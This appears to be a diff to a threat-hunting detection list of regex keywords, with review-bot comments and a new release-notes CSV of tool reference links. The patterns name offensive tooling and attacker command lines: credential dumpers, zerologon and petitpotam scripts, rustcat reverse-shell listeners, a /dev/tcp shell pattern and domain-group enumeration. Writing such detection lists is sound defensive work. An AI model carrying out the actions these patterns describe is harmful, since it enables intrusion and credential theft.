.*/spiderfoot\.git.* @@ -5584,6 +5642,7 @@ .*/spoof/mdns.* .*/spoof/spoof_windows\..* .*/SpookFlare\.git.* +.*/spooler\.py.* .*/spoolsystem/SpoolTrigger/.* .*/spray/spray\.py.* .*/Spray365.* 
@@ -5622,6 +5681,7 @@ .*/src/nysm\.c.* .*/src/RecycledGate\.h.* .*/src/Sleeper\.cpp.* +.*/src/unixshell\.rs.* .*/srdi-shellcode\.go.* .*/ssh2-enum-algos\.nse.* .*/ssh-auth-methods\.nse.* @@ -5722,6 +5782,7 @@ .*/tcpshell\.py.* .*/Teamphisher\.txt.* .*/Teamphisher/targets\.txt.* +.*/teams_localdb\.py.* .*/teamserver-linux\.tar\.gz.* .*/teamserver-win\.zip.* .*/teamspeak2-version\.nse.* @@ -5836,6 +5897,7 @@ .*/tso-enum\.nse.* .*/tweetshell\.sh.* .*/twittor\.git.* +.*/uac\.py.* .*/UACBypasses/.* .*/UACME\.git.* .*/UAC-SilentClean/.* @@ -5884,6 +5946,7 @@ .*/vajra/phishApp\.py.* .*/var/lib/ptunnel.* .*/var/log/exegol/.*\.log.* +.*/veeam_dump\.py.* .*/Vegile\.git.* .*/venom\.git.* .*/venom\.sh .* @@ -5937,14 +6000,17 @@ .*/WDExtract\.git.* .*/wdextract32\.exe.* .*/wdextract64\.exe.* +.*/wdigest\.py.* .*/WdToggle\.c.* .*/WdToggle\.h.* .*/weakpass\.git.* .*/Web/decouverte\.txt.* .*/Web/discovery\.txt.* .*/web/pwn\.html.* +.*/web_delivery\.py.* .*/web_rce\.py.* .*/WebC2\.cs.* +.*/webdav\.py.* .*/WebDavC2\.git.* .*/web-hacking-toolkit.* .*/weblistener\.py.* @@ -5963,6 +6029,7 @@ .*/WfpTokenDup\.exe.* .*/whatlicense\.git.* .*/WheresMyImplant/.* +.*/whoami\.py.* .*/WhoAmI\.task.* .*/whois-domain\.nse.* .*/whois-ip\.nse.* @@ -5998,7 +6065,9 @@ .*/winrm\.py.* .*/winrmdll.* .*/winrm-reflective-dll/.* +.*/winscp_dump\.py.* .*/Winsocky\.git.* +.*/wireless\.py.* .*/wiresocks\.git.* .*/wmeye/.* .*/WMI Lateral Movement/.* @@ -6053,6 +6122,7 @@ .*/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb\.bin.* .*/zerologon\.cna.* .*/zerologon\.py.* +.*/zerologon\.py.* .*/zhzyker/CVE-2020-5902.* .*/zsh_executor/.*\.go.* .*/zwjjustdoit/cve-2022-23131.* 
@@ -6070,6 +6140,7 @@ .*\?PSAmsi.*PSReflect\.ps1.* .*\?sample_sliver\.json.* .*\[!] Failed to enumerate Credman:.* +.*\[!] Dumping the ntds can crash the DC on Windows Server 2019\. Use the option.* .*\[!] Failed to download legitimate GPO from SYSVOL \(dc_ip:.* .*\[!] Failed to write malicious scheduled task to downloaded GPO\. Exiting.* .*\[\#] Ready For ETW Patch\..* @@ -6165,7 +6236,9 @@ .*\\9\.dll .*\\9\.exe .*\\AbandonedCOMKeys\..* +.*\\adcs\.py.* .*\\ADCSPwn.* +.*\\add_computer\.py.* .*\\ADFSpoof\.py.* .*\\ADFSpray.* .*\\ADGet\.exe.* @@ -6211,6 +6284,7 @@ .*\\BesoToken\.cpp.* .*\\BesoToken\.exe.* .*\\BesoToken\.vcxproj.* +.*\\bh_owned\.py.* .*\\bin\\cme\.exe.* .*\\bin\\shepard\\.* .*\\BITB-main.* @@ -6268,6 +6342,7 @@ .*\\CurrentVersion\\Uninstall\\FreeFileSync_is1.* .*\\CustomEncoding\.cpp.* .*\\D1rkInject\\.* +.*\\daclread\.py.* .*\\darkexe\.py.* .*\\DarkLoadLibrary\..* .*\\dcrypt\.exe.* @@ -6286,6 +6361,7 @@ .*\\Dendron\.bin.* .*\\Dendron\.exe.* .*\\Dendron\.sln.* +.*\\dfscoerce\.py.* .*\\DInjector\.sln.* .*\\DInjector\\.* .*\\dist\\sigthief\.exe.* @@ -6301,6 +6377,7 @@ .*\\donut\.exe.* .*\\donut\\VanillaProgram\.bin.* .*\\Doraemon.* +.*\\drop-sc\.py.* .*\\duedlligence\.dll.* .*\\dumper\.ps1.* .*\\dumpert\..* @@ -6319,8 +6396,11 @@ .*\\Elite\.csproj.* .*\\Elite\.sln.* .*\\emailall\.py.* +.*\\empire_exec\.py.* .*\\enc_shellcode\.bin.* .*\\enc_shellcode\.h.* +.*\\enum_av\.py.* +.*\\enum_dns\.py.* .*\\ES\.Alan\.Core.* .*\\EternalHushCore\.dll.* .*\\EternalHushCore\\.* @@ -6346,6 +6426,7 @@ .*\\Fertliser\.exe.* .*\\Fertliser\.pdb.* .*\\Files\\ContainersFileUrls\.txt.* +.*\\find-computer\.py.* .*\\follina\.py.* .*\\FreeFileSync\.exe.* .*\\FreeFileSync\\Logs\\.* @@ -6354,7 +6435,9 @@ .*\\freeze\.go .*\\FtpC2\\.* .*\\FudgeC2.* +.*\\get_netconnections\.py.* .*\\GetBrowsers\.ps1.* +.*\\get-desc-users\.py.* .*\\Get-SpoolStatus\.ps1.* .*\\GetWebDAVStatus\\ .*\\GetWebDAVStatus_x64.* 
@@ -6371,15 +6454,21 @@ .*\\go-secdump.* .*\\goZulipC2.* .*\\GPOddity\\.* +.*\\gpp_autologin\.py.* +.*\\gpp_password\.py.* +.*\\group_members\.py.* .*\\Group3r\.exe.* .*\\Grouper2\.exe.* +.*\\groupmembership\.py.* .*\\GzipB64\.exe.* .*\\HackBrowserData.* .*\\Hades\.exe.* .*\\hades\.exe.* .*\\hades-main\.zip.* .*\\handlekatz\.exe.* +.*\\handlekatz\.py.* .*\\harvest\.cmb.* +.*\\hash_spider\.py.* .*\\hashview\.py.* .*\\HiddenDesktop\\.* .*\\hijackers\\.* @@ -6401,6 +6490,7 @@ .*\\IDiagnosticProfileUAC.* .*\\iis_controller\.py.* .*\\impacket\..* +.*\\impersonate\.py.* .*\\Implant\.exe .* .*\\implant\.exe .*\.exe .*\\ImplantSSP\.exe.* @@ -6408,9 +6498,11 @@ .*\\inceptor\.py.* .*\\injector\.ps1 1 .* .*\\injector\.ps1 2 .* +.*\\install_elevated\.py.* .*\\Inveigh\.exe.* .*\\inveigh\.exe.* .*\\Inveigh\\bin\\.* +.*\\IOXIDResolver\.py.* .*\\IPfuscation\.cpp.* .*\\IPfuscation\.exe.* .*\\ipscan-.*-setup\.exe.* @@ -6423,6 +6515,8 @@ .*\\JunctionFolder\.csproj.* .*\\katz\.ps1.* .*\\kdstab\.exe.* +.*\\keepass_discover\.py.* +.*\\keepass_trigger\.py.* .*\\KeeTheft\.exe.* .*\\kerberoast\.c.* .*\\KernelTokens\.sys.* @@ -6440,8 +6534,10 @@ .*\\Ladon\.exe.* .*\\Ladon\.ps1.* .*\\lansearch\.exe.* +.*\\laps\.py.* .*\\LAPSDumper\\.* .*\\ldap_search_bof\.py.* +.*\\ldap-checker\.py.* .*\\LibSnaffle.* .*\\Loader\\Loader\.csproj.* .*\\local_admins\.csv.* @@ -6452,18 +6548,22 @@ .*\\lsass\.dmp.* .*\\LSASSProtectionBypass\\.* .*\\LsassSilentProcessExit.* +.*\\lsassy_dump\.py.* .*\\m3-gen\.py.* .*\\MaccaroniC2.* +.*\\MachineAccountQuota\.py.* .*\\macoffe\.pdb.* .*\\malseclogon\..* .*\\MalStuff\.cpp.* .*\\malware_runner\.py.* .*\\manspider_.*\.log.* +.*\\masky\.py.* .*\\master\\GPSCoordinates\\.* .*\\Mayhem\.psm1.* .*\\megatools-.*-win64\\.* .*\\megatools\.exe.* .*\\mem_dll\.pdb.* +.*\\met_inject\.py.* .*\\mhydeath64.* .*\\mimi32\.exe.* .*\\mimi64\.exe.* 
@@ -6472,17 +6572,29 @@ .*\\monkey\.exe .* .*\\monkey32\.exe.* .*\\monkey64\.exe.* +.*\\ms17-010\.py.* .*\\Mshikaki\.cpp.* +.*\\msi_search\.c.* +.*\\msi_search\.exe.* +.*\\msi_search\.ps1.* +.*\\msi_search\.x64\.o.* +.*\\msi_search\.x86\.o.* +.*\\msol\.py.* .*\\MSOL\\DomainCompanyInfo\.txt.* +.*\\mssql_priv\.py.* .*\\mystikal\.py.* .*\\nanodump.* +.*\\nanodump\.py.* .*\\net.*\\ftpagent\.exe.* .*\\net\.exe.* accounts.* .*\\net\.exe.* localgroup admin.* .*\\net\.exe.* sessions.* .*\\net\.exe.* view .*/domain.* .*\\net1 sessions.* +.*\\netexec\.py.* +.*\\netexec\.yml.* .*\\NetExec-main.* +.*\\NetExec-main\\.* .*\\NetLoader\.exe.* .*\\netscan\.exe.* .*\\netscan\.exe.* @@ -6503,6 +6615,7 @@ .*\\NoFilter\.sln.* .*\\NoFilter\.vcxproj.* .*\\nopac\.exe.* +.*\\nopac\.py.* .*\\NoPowerShell.* .*\\NoPowerShell\..* .*\\No-PowerShell\.cs.* @@ -6513,13 +6626,18 @@ .*\\NPPSpy\.txt.* .*\\ntdlll-unhooking-collection.* .*\\ntdlol\.txt.* +.*\\ntdsutil\.py.* .*\\ntlm\.py.* .*\\NTLMRelay2Self.* .*\\ntlmutil\.py.* +.*\\ntlmv1\.py.* .*\\NtoskrnlOffsets\.csv.* .*\\NtRemoteLoad\.sln.* .*\\NtRights\\.* .*\\Nuages_Cli.* +.*\\nxc\.exe.* +.*\\nxc\\parsers\\ip\.py.* +.*\\nxc\\parsers\\nmap\.py.* .*\\obfy-1\.0\.zip.* .*\\OffensiveCSharp\\.* .*\\out_pe\.exe.* @@ -6527,6 +6645,7 @@ .*\\papacat\.ps1.* .*\\papacat\.zip.* .*\\ParsedMalleableData\.txt.* +.*\\parsers\\nessus\.py.* .*\\password\.lst.* .*\\Passwordfiles\.txt.* .*\\PatchingAPI\.cpp.* @@ -6536,6 +6655,7 @@ .*\\PerfExec\.exe.* .*\\Persistence\.cpp.* .*\\Persistence\.exe.* +.*\\petitpotam\.py.* .*\\pipe\\brutepipe.* .*\\PipeViewer\.exe.* .*\\PipeViewer\.sln.* @@ -6567,11 +6687,13 @@ .*\\PPLBlade-main.* .*\\PPLFault.* .*\\PPLKiller.* +.*\\printnightmare\.py.* .*\\PrintSpoofer\.cs.* .*\\PrintSpoofer-1\.0\.zip.* .*\\PrivEditor\\.* .*\\PrivescCheck.* .*\\PrivKit\\.* +.*\\procdump\.py.* .*\\Process Hacker 2\\.* .*\\process_killer\.cpp.* .*\\ProduKey\.exe.* 
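Review bot: `.*\\nanodump\.py.*` in the `@@ -6472,17 +6572,29 @@` hunk cannot match anything that the context line `.*\\nanodump.*` above it does not already match, and `.*\\NetExec-main\\.*` is covered the same way by `.*\\NetExec-main.*`. Later hunks add more subsumed entries: `.*Invoke-Obfuscation -ScriptPath .*` and `.*Invoke-Obfuscation\.psd1.*` under `.*Invoke-Obfuscation.*`, `.*msol_dump\.ps1.*` under `.*msol_dump.*`, and the two `veeam_dump_*\.ps1` lines under `.*veeam_dump.*`. If the narrower strings are meant to carry a higher severity, that belongs in the per-keyword metadata. In this flat list they only add matching cost, so either remove them or tighten the broad parent pattern.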
@@ -6598,6 +6720,9 @@ .*\\RasmanPotato.* .*\\ratchatPT\.go.* .*\\ratchatPT\.syso.* +.*\\rcat-v.*-win-x86_64\.exe.* +.*\\rdcman\.py.* +.*\\rdp\.py.* .*\\RDPCredsStealerDLL.* .*\\RealTimeSync\.exe.* .*\\Reaper\\Reaper\.cpp.* @@ -6609,6 +6734,7 @@ .*\\RedPersist\.pdb.* .*\\RedPersist\.sln.* .*\\RedPersist-main\\.* +.*\\reg-query\.py.* .*\\RemoteCamera\.dll.* .*\\Resources\\Disks-NoEncryption\.txt.* .*\\resources\\PROCEXP\.sys.* @@ -6625,6 +6751,7 @@ .*\\run\\john\\.*\.pl.* .*\\run\\john\\.*\.py.* .*\\RunasCs\.cs.* +.*\\runasppl\.py.* .*\\RunBOF\.exe.* .*\\RunOF\.exe.* .*\\RunOF\\bin\\.* @@ -6633,6 +6760,7 @@ .*\\samantha\.txt .*\\save_reg\.hive.* .*\\scanACLsResults\.csv.* +.*\\scan-network\.py.* .*\\scmuacbypass\.cpp.* .*\\scmuacbypass\.exe.* .*\\SCMUACBypass\\.* @@ -6645,6 +6773,7 @@ .*\\ScriptSentry\.psd1.* .*\\ScriptSentry\.psm1.* .*\\ScriptSentry\.txt.* +.*\\scuffy\.py.* .*\\Seatbelt\.txt.* .*\\Seatbelt\\Commands\\.* .*\\ServerC2\.cpp.* @@ -6656,6 +6785,7 @@ .*\\SessionSearcher\.csproj.* .*\\SessionSearcher\.exe.* .*\\shadowcoerce\.py.* +.*\\shadowcoerce\.py.* .*\\ShadowSpray\\.*\.cs.* .*\\Sharefinder\.ps1.* .*\\SharpAzbelt\.csproj.* @@ -6687,6 +6817,7 @@ .*\\SimpleLoader\.cpp.* .*\\SimpleLoader\.exe.* .*\\sitadel\.log.* +.*\\slinky\.py.* .*\\SMB_RPC\\.*\.py .*\\smuggler\.py.* .*\\sniff\.py.* @@ -6695,7 +6826,9 @@ .*\\spellbound-main.* .*\\spellgen\.py .* .*\\spellstager\.py .* +.*\\spider_plus\.py.* .*\\SpoofCmdLine\\TheThing.* +.*\\spooler\.py.* .*\\SprayAD\.cna.* .*\\SprayAD\.exe.* .*\\SQLInfoDumps.* @@ -6713,6 +6846,7 @@ .*\\systemic\.txt .*\\TakeMyRDP.* .*\\TASKSHELL\.EXE.* +.*\\teams_localdb\.py.* .*\\teamserver-win\.zip.* .*\\teamstracker\.py.* .*\\Temp\\.*\\ntds\.dit.* @@ -6747,6 +6881,7 @@ .*\\Tor\\torrc.* .*\\TorBrowser.* .*\\TrustExec\.exe.* +.*\\uac\.py.* .*\\UACME-.*\.zip.* .*\\uberfile\.py.* .*\\unDefender\.exe.* 
@@ -6766,6 +6901,7 @@ .*\\uTorrent\\.* .*\\utweb\.exe.* .*\\UUID_bypass\.py.* +.*\\veeam_dump\.py.* .*\\wce32\.exe.* .*\\wce64\.exe.* .*\\wce-beta\.zip.* @@ -6774,11 +6910,15 @@ .*\\wdextract\.vcxproj.* .*\\wdextract32\.exe.* .*\\wdextract64\.exe.* +.*\\wdigest\.py.* .*\\WdigestOffsets\.csv.* +.*\\web_delivery\.py.* +.*\\webdav\.py.* .*\\WfpTokenDup\.exe.* .*\\whatlicense-main\\.* .*\\WheresMyImplant.* .*\\while_dll_ms.* +.*\\whoami\.py.* .*\\Windows\\Prefetch\\PSEXEC.* .*\\Windows\\Tasks\\Certipy.* .*\\Windows\\Tasks\\p4yl0ad.* @@ -6789,7 +6929,9 @@ .*\\WindowsShareFinder\.cs.* .*\\Win-PS2EXE.* .*\\WinRing0x64\.sys.* +.*\\winscp_dump\.py.* .*\\WiperPoc\.cpp.* +.*\\wireless\.py.* .*\\wl_log\.txt.* .*\\wl-lic\.exe.* .*\\wl-lic\.pdb.* @@ -6810,6 +6952,7 @@ .*\\XOR_b64_encrypted\\.* .*\\xorencrypt\.py.* .*\\ysoserial\\.* +.*\\zerologon\.py.* .*] Eventviewer Persistence created.* .*] Extension Hijacking Persistence created.* .*] Found non-ASCII service: .* @@ -7322,6 +7465,7 @@ .*Add-Exfiltration\.ps1.* .*Add-KeePassConfigTrigger.* .*AddKeePassTrigger\.ps1.* +.*AddKeePassTrigger\.ps1.* .*Add-MpPreference -ExclusionPath .* .*Add-MpPreference -ExclusionProcess .*\\Windows\\System32\\WindowsPowerShell\\v1\.0\\powershell\.exe.* .*Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder.*CN=System' -PrincipalSamAccountName .* -Rights All.* @@ -7605,6 +7749,7 @@ .*arp\.spoof on.* .*arp\.spoof\..* .*arp\.spoof\.targets.* +.*arp_mitm\.py.* .*arp_spoof\..* .*arpspoof -i .* .*ArpSpoofer.* @@ -7825,6 +7970,7 @@ .*B374K.*index\.php.* .*b3rito.*yodo.* .*b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94.* +.*B473B9A4135DE247C6D76510B40F63F8F1E5A2AB.* .*b4ldr/nse-scripts.* .*b4rtik/RedPeanut.* .*b4rtik/RedPeanut.* @@ -8169,6 +8315,7 @@ .*bkeylogger.* .*bkkgdjpomdnfemhhkalfkogckjdkcjkg.* .*bks2john\.py.* +.*blackarch/tree/master/packages/rustcat.* .*blackarrowsec/mssqlproxy.* .*blackarrowsec/pivotnacci.* .*blackhat-arsenal-tools.* 
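Review bot: `.*B473B9A4135DE247C6D76510B40F63F8F1E5A2AB.*` in the `@@ -7825,6 +7970,7 @@` hunk is an upper-case 40-hex-character value placed next to a lower-case digest, and nothing in the list says whether consumers match case-insensitively. Tools print hashes and thumbprints in either case, so store one canonical case and document the matching mode; otherwise the indicator is missed whenever the log source uses the other case. The same applies to `.*EC235B9DDBCA83FD5BE2B80E2D543B07BE7E1052.*` added in `@@ -10193,6 +10341,7 @@`. It would also help to record in the keyword metadata what the value identifies (presumably a file hash or a certificate thumbprint), since the string alone cannot be triaged.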
@@ -8768,6 +8915,7 @@ .*ChaitanyaHaritash/kimi.* .*chameleon\.py .* .*changepasswd\.py.* +.*change-windows10-mac-address\.py.* .*charlesnathansmith/whatlicense.* .*charles-proxy.* .*charlotte-main\.zip.* @@ -10193,6 +10341,7 @@ .*EasyHook-Managed/LocalHook\.cs.* .*EasyPersistent\.cna.* .*Ebowla-master\.zip.* +.*EC235B9DDBCA83FD5BE2B80E2D543B07BE7E1052.* .*echo .* \.bash_history.* .*echo .* /home/.*/\.bash_history.* .*echo .* /root/\.bash_history.* @@ -10495,6 +10644,8 @@ .*exec /bin/sh 0&0 2>&0.* .*exec 5<>/dev/tcp/.*/.*.*cat <&5 \| while read line.* do \$line 2>&5 >&5.* done.* .*exec CMD=/bin/sh -f elf -o .*\.elf.* +.*Exec_Command_Silent\.vbs.* +.*Exec_Command_WithOutput\.vbs.* .*exec_payload_msi.* .*exec_shellcode\.rb.* .*ExecCmdImplant.* @@ -11874,7 +12025,9 @@ .*hook-lsassy\.py.* .*hook-lsassy\.py.* .*hook-lsassy\.py.* +.*hook-lsassy\.py.* .*hook-pypsrp\.py.* +.*hook-pypykatz\.py.* .*HOST/EXEGOL-01\..* .*Host: FUZZ\.machine\.org.* .*HostEnum\.ps1.* @@ -12775,7 +12928,9 @@ .*Invoke-noPac\..* .*Invoke-NTLMAuth\.ps1.* .*Invoke-Ntsd\.ps1.* +.*Invoke-Obfuscation -ScriptPath .* .*Invoke-Obfuscation.* +.*Invoke-Obfuscation\.psd1.* .*Invoke-OpenInboxFinder.* .*Invoke-OpenOWAMailboxInBrowser.* .*Invoke-OxidResolver.* @@ -12867,6 +13022,7 @@ .*Invoke-PSImage.* .*Invoke-PSInject.* .*Invoke-PSInject\.ps1.* +.*Invoke-PSInject\.ps1.* .*Invoke-PsUACme.* .*Invoke-PsUACme.* .*Invoke-PsUACme.* @@ -13692,6 +13848,7 @@ .*lan_sw_port_scan\.json.* .*lanjelot.* .*LANs\.py.* +.*lanscan_arp\.py.* .*lansearch\.exe .* .*lansearchpro_portable\.zip.* .*lansearchpro_setup\.exe.* @@ -14146,6 +14303,7 @@ .*manager/mRemoteNG\.py.* .*mandiant/DueDLLigence.* .*mandiant/gocrack.* +.*mandiant/msi-search.* .*mandllinject .* .*manspider .* -d .* -u .* -p .* .*manspider .*/24 -f .* 
@@ -14549,9 +14707,11 @@ .*Mshikaki-main.* .*mshta/shellcode_inject.* .*MSHTAStager.* +.*msi-search-main\.zip.* .*msLDAPDump\.py.* .*MSOfficeManipulator\.cs.* .*msol_dump.* +.*msol_dump\.ps1.* .*MSOLSpray .* .*MSOLSpray\.git.* .*MSOLSpray\.ps1.* @@ -14742,9 +14902,19 @@ .*nessus-updates.*\.tar\.gz.* .*net domain_controllers.* .*net group .*Domain Admins.* /domain.* +.*net group .*Account Operators.* /domain.* +.*net group .*Backup Operators.* /domain.* .*net group .*domain admins.* /domain.* +.*net group .*Domain Computers.* /domain.* +.*net group .*Domain Controllers.* /domain.* .*net group .*Domain Controllers.*/domain.* .*net group .*Enterprise Admins.* /dom.* +.*net group .*Enterprise Admins.* /domain.* +.*net group .*Exchange Trusted Subsystem.* /domain.* +.*net group .*Microsoft Exchange Servers.* /domain.* +.*net group .*Print Operators.* /domain.* +.*net group .*Schema Admins.* /domain.* +.*net group .*Server Operators.* /domain.* .*net group / domain .*Domain Admins.* .*net group /domain .*Domain Admins.* .*net group administrators /domain.* @@ -14759,6 +14929,16 @@ .*net user john H4x00r123.* .*net view /all /domain.* .*net.* group Administrator.* /add /domain.* +.*net\.exe.* group .*Account Operators.* /domain.* +.*net\.exe.* group .*Backup Operators.* /domain.* +.*net\.exe.* group .*Domain Computers.* /domain.* +.*net\.exe.* group .*Domain Controllers.* /domain.* +.*net\.exe.* group .*Enterprise Admins.* /domain.* +.*net\.exe.* group .*Exchange Trusted Subsystem.* /domain.* +.*net\.exe.* group .*Microsoft Exchange Servers.* /domain.* +.*net\.exe.* group .*Print Operators.* /domain.* +.*net\.exe.* group .*Schema Admins.* /domain.* +.*net\.exe.* group .*Server Operators.* /domain.* .*net\.fuzz .* .*net\.fuzz\..* .*net\.probe on 
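Review bot: The new `net group` lines in the `@@ -14742,9 +14902,19 @@` hunk require the full `/domain` switch, while the neighbouring context line `.*net group .*Enterprise Admins.* /dom.*` accepts the shortened form, so a command typed with the short switch is caught for that group and missed for the other added ones. Writing them as `.*net group .*Account Operators.* /dom.*` (and likewise for the rest) closes that gap; the `net\.exe` block in the next hunk and the `net1` / `net1\.exe` blocks in `@@ -14781,7 +14961,27 @@` need the same change. Two of the additions, `.*net group .*Enterprise Admins.* /domain.*` and `.*net group .*Domain Controllers.* /domain.*`, are already covered by existing lines and can be dropped. The list also keeps both `Domain Admins` and `domain admins`, which suggests case-sensitive matching; if so, the new group names need a second spelling too, or the consumer needs a case-insensitive flag.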
@@ -14781,7 +14961,27 @@ .*net_localgroup_member -Group.* .*net_portscan\.py.* .*net_recon\..* +.*net1 group .*Account Operators.* /domain.* +.*net1 group .*Backup Operators.* /domain.* +.*net1 group .*Domain Computers.* /domain.* +.*net1 group .*Domain Controllers.* /domain.* +.*net1 group .*Enterprise Admins.* /domain.* +.*net1 group .*Exchange Trusted Subsystem.* /domain.* +.*net1 group .*Microsoft Exchange Servers.* /domain.* +.*net1 group .*Print Operators.* /domain.* +.*net1 group .*Schema Admins.* /domain.* +.*net1 group .*Server Operators.* /domain.* .*net1 localgroup admin.* +.*net1\.exe.* group .*Account Operators.* /domain.* +.*net1\.exe.* group .*Backup Operators.* /domain.* +.*net1\.exe.* group .*Domain Computers.* /domain.* +.*net1\.exe.* group .*Domain Controllers.* /domain.* +.*net1\.exe.* group .*Enterprise Admins.* /domain.* +.*net1\.exe.* group .*Exchange Trusted Subsystem.* /domain.* +.*net1\.exe.* group .*Microsoft Exchange Servers.* /domain.* +.*net1\.exe.* group .*Print Operators.* /domain.* +.*net1\.exe.* group .*Schema Admins.* /domain.* +.*net1\.exe.* group .*Server Operators.* /domain.* .*netCat.* .*net-creds.* .*netdiscover -i .* -r .*/24.* @@ -14793,6 +14993,7 @@ .*NetExec ldap .* -M enum_trusts.* .*NetExec winrm .*--.* .*NetExec-main\.zip.* +.*NetExec-main\.zip.* .*Net-GPPPassword\.cs.* .*Net-GPPPassword\.exe.* .*Net-GPPPassword_dotNET.* @@ -14923,6 +15124,8 @@ .*nmap -Pn -v -sS -F.* .*nmap-.*-setup\.exe.* .*nmap/ncrack.* +.*nmap_port_scanner\.py.* +.*nmap_port_scanner_ip_obj\.py.* .*nmap_smb_scan_custom_.*\.txt.* .*nmapAnswerMachine\.py.* .*nmap-elasticsearch-nse.* @@ -15082,6 +15285,8 @@ .*nxc mssql .*--local-auth.* .*nxc ssh .* .*nxc winrm .* -X .* +.*nxc.*nxcdb\.py.* +.*nxcdb-zipapp-.* .*nysm\.skel\.h.* .*nysm-master\.zip.* .*nyxgeek.* @@ -15324,6 +15529,7 @@ .*package=impacket.* .*PackMyPayload\.py.* .*PackMyPayload-master.* +.*pacman -S rustcat.* .*pacu --exec .* .*pacu --list-modules.* .*pacu --module-args=.* 
@@ -15702,6 +15908,8 @@ .*pornhub\.py.* .*port and pasv both active.* .*port_forward_pivot\.py.* +.*port_scanner_ip_obj\.py.* +.*port_scanner_regex\.py.* .*PortBender backdoor.* .*PortBender redirect.* .*PortBender\.cna.* @@ -16257,6 +16465,7 @@ .*pwn_jenkins.* .*pwn1sher/CS-BOFs.* .*pwn1sher/WMEye.* +.*pwn3d_label = Pwn3d!.* .*pwnagotchi.* .*pwnat\.exe.* .*pwncat-cs .*:.* @@ -16305,6 +16514,7 @@ .*pyherion\.py.* .*pyhon3 poc\.py .* curl http://.*/shell\.sh -o /tmp/shell\.sh.* .*pyinstaller .*\.py.* +.*pyinstaller netexec\.spec.* .*pyinstaller\.exe.* .*pyinstaller/tarball.* .*pyinstaller-script\.py.* @@ -16563,6 +16773,15 @@ .*RBCD_Petitpotam_VulnerableServers\.txt.* .*rbsec/dnscan.* .*rc4\.py .*\.bin.* +.*rcan listen -ib .* +.*rcat c -s bash .* +.*rcat connect -s bash.* +.*rcat listen 55660.* +.*rcat listen -ie .* +.*rcat listen -l .* +.*rcat-v3\..*darwin-aarch64.* +.*rcat-v3\..*-darwin-x86_64.* +.*rcat-v3\..*-linux-x86_64.* .*RCE-exploits.* .*rclone copy .*:.* .*rclone\.exe config create remote mega user .* @@ -16820,6 +17039,7 @@ .*Remove-Item .*C:\\Users\\.*\\AppData\\Roaming\\AnyDesk\\connection_trace\.txt.* .*Remove-KeePassConfigTrigger.* .*RemoveKeePassTrigger\.ps1.* +.*RemoveKeePassTrigger\.ps1.* .*remove-persistence.* .*Remove-Persistence\.ps1.* .*remove-persistence-cron.* @@ -16854,6 +17074,7 @@ .*responder-smb-on.* .*Responder-Windows.* .*RestartKeePass\.ps1.* +.*RestartKeePass\.ps1.* .*restic2john\.py.* .*restore_signature\.sh .*\.dmp.* .*RestrictedAdmin\.exe.* @@ -17119,6 +17340,7 @@ .*RuralBishop\.sln.* .*RuralBishop-master.* .*rustbof\.cna.* +.*rustcat-3\.0\.0\.zip.* .*rusthound .* --zip --ldaps --adcs --old-bloodhound.* .*rusthound .*--domain.* .*rusthound .*--ldapfqdn .* @@ -17297,6 +17519,7 @@ .*scshellbof\.o.* .*scshellbofx64.* .*scumjr.*dirtycow-vdso.* +.*Search cached MSI files in C:/Windows/Installer/.* .*search_for_secrets\(.* .*Search-cpassword.* .*SearchOutlook\.exe.* 
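Review bot: `.*rcan listen -ib .*` in the `@@ -16563,6 +16773,15 @@` hunk looks like a typo for `rcat`: every sibling line and the release artefact names in the same hunk use `rcat`, so this pattern would not match the command it is meant to catch. Change it to `.*rcat listen -ib .*`. In the same hunk `.*rcat listen 55660.*` pins one port number, which only matches a copied example; the flag-based lines next to it are the ones that generalise.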
@@ -18674,6 +18897,7 @@ .*targetver\.h.* .*tarunkant/Gopherus.* .*tas389\.ps1.* +.*taskkill /F /T /IM keepass\.exe /FI.* .*tasklist /fi .*Imagename eq lsass\.exe.* \| find .*lsass.* .*tasklist /svc \| findstr /i .*vmtoolsd\.exe.*.* .*TaskShell\.exe .* -b .*\.exe.* @@ -19207,6 +19431,8 @@ .*vectra-ai-research/MAAD-AF.* .*veeam_credential_dump\..* .*veeam_dump.* +.*veeam_dump_mssql\.ps1.* +.*veeam_dump_postgresql\.ps1.* .*Vegile -.* .*venv wapiti3.* .*Verified Merlin server .* @@ -19402,6 +19628,8 @@ .*WhoamiGetTokenInfo.* .*wifi/airpwn.* .*wifi/dnspwn.* +.*wifi_dos_own\.py.* +.*wifi_dos3\.py.* .*wifi_dump_linux.* .*wifi_fake_auth\..* .*WiFi_Hacker\.ino.* @@ -19797,6 +20025,7 @@ .*Yay! No SYSMON here!.* .*YDHCUI/csload\.net.* .*YDHCUI/manjusaka.* +.*yeelight_discover\.py.* .*Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc\+AC.* .*ylAo2kAlUS2kYkala!.* .*Yml0c3kubWl0LmVkdQ==.* @@ -19999,6 +20228,7 @@ pupysh python3 start_campaign\.py raw_keylogger .* rawshark -.* +rcat listen .* RedGuard -.* remotereg .* rev2self.* diff --git a/release_notes/Release_20231005.csv b/release_notes/Release_20231005.csv new file mode 100644 index 000000000..41cddf2b4 --- /dev/null +++ b/release_notes/Release_20231005.csv 
@@ -0,0 +1,2076 @@ +"metadata_tool","metadata_link" +"$index_allocation","https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/" +"_","N/A" +"0d1n","https://github.com/CoolerVoid/0d1n" +"1clickVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"365-Stealer","https://github.com/AlteredSecurity/365-Stealer" +"3snake","https://github.com/blendin/3snake" +"7zip","http://www.joeware.net/freetools/tools/adfind/index.htm" +"AbandonedCOMKeys","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys" +"acheron","https://github.com/f1zm0/acheron" +"ACLight","https://github.com/cyberark/ACLight" +"Aclpwn","https://github.com/fox-it/aclpwn.py" +"acltoolkit","https://github.com/zblurx/acltoolkit" +"ActiveScanPlusPlus","https://github.com/albinowax/ActiveScanPlusPlus" +"AD exploitation cheat sheet","https://stealthbits.com/blog/compromise-powerupsql-sql-attacks/" +"AD exploitation cheat sheet","https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainForeignGroupMember/" +"AD exploitation cheat sheet","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference" 